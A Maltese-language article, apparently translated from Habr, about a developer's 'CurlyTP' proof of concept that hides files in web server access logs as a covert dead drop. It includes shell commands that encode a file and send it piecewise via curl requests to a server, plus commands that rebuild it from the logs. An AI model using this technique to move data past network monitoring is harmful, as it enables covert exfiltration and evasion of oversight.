Skont id-definizzjoni tal-Wikipedija, qatra mejta hija għodda ta 'konfoffa li sservi għall-iskambju ta' informazzjoni jew xi oġġetti bejn nies li jużaw post sigriet. L-idea hija li n-nies qatt ma jiltaqgħu - iżda xorta jiskambjaw informazzjoni biex iżommu s-sigurtà operattiva.
Il-post tal-ħabi m'għandux jiġbed l-attenzjoni. Għalhekk, fid-dinja offline ħafna drabi jużaw affarijiet diskreti: briks maħlul fil-ħajt, ktieb tal-librerija, jew vojta f'siġra.
Hemm ħafna għodod ta 'kodifikazzjoni u anonimizzazzjoni fuq l-Internet, iżda l-fatt stess li tuża dawn l-għodod jiġbed l-attenzjoni. Barra minn hekk, jistgħu jiġu mblukkati fil-livell korporattiv jew tal-gvern. X'tagħmel?
L-iżviluppatur Ryan Flowers ippropona għażla interessanti -
Jirriżulta li kwalunkwe web server jippermettilek li tissejvja kważi kull messaġġ fil-log. Fjuri staqsiet kif tuża dan.
Huwa joffri din l-għażla:
- Ħu fajl test (messaġġ sigriet) u kkalkula l-hash (md5sum).
- Aħna nikkodifikawh (gzip+uuencode).
- Aħna niktbu fil-log billi tuża talba deliberatament żbaljata lis-server.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
Biex taqra fajl, għandek bżonn twettaq dawn l-operazzjonijiet f'ordni invers: iddekodifika u unzip il-fajl, iċċekkja l-hash (il-hash jista 'jiġi trażmess b'mod sikur fuq kanali miftuħa).
L-ispazji huma sostitwiti bi =+=
sabiex ma jkunx hemm spazji fl-indirizz. Il-programm, li l-awtur isejjaħ CurlyTP, juża kodifikazzjoni base64, bħal attachments tal-email. It-talba ssir b'kelma prinċipali ?transfer?
sabiex ir-riċevitur ikun jista’ faċilment isibha fir-zkuk.
X'naraw fil-zkuk f'dan il-każ?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
Kif diġà ssemma, biex tirċievi messaġġ sigriet għandek bżonn twettaq l-operazzjonijiet f'ordni inversa:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
Il-proċess huwa faċli biex jiġi awtomatizzat. Md5sum taqbel, u l-kontenut tal-fajl jikkonferma li kollox kien dekodifikat b'mod korrett.
Il-metodu huwa sempliċi ħafna. "Il-punt ta 'dan l-eżerċizzju huwa biss li jipprova li l-fajls jistgħu jiġu ttrasferiti permezz ta' talbiet żgħar tal-web innoċenti, u jaħdem fuq kwalunkwe server tal-web b'logs ta 'test sempliċi. Essenzjalment, kull web server huwa ħabi!” jikteb Flowers.
Naturalment, il-metodu jaħdem biss jekk ir-riċevitur ikollu aċċess għal zkuk tas-server. Iżda tali aċċess huwa pprovdut, pereżempju, minn ħafna hosters.
Kif tużah?
Ryan Flowers jgħid li mhuwiex espert tas-sigurtà tal-informazzjoni u mhux se jikkompila lista ta 'użi possibbli għal CurlyTP. Għalih, hija biss prova ta’ kunċett li l-għodod familjari li naraw kuljum jistgħu jintużaw b’mod mhux konvenzjonali.
Fil-fatt, dan il-metodu għandu numru ta 'vantaġġi fuq "ġlud" oħra ta' server simili
Dan huwa wieħed mill-modi biex jittrasmettu messaġġi permezz ta 'fajls ta' servizz. Tista 'tiftakar kif xi kumpaniji avvanzati kienu jqiegħdu
L-idea kienet li l-iżviluppaturi tal-web biss jaraw din il-bajda tal-Għid, peress li persuna normali ma tħaresx lejn l-headers jew il-kodiċi HTML.
Sors: www.habr.com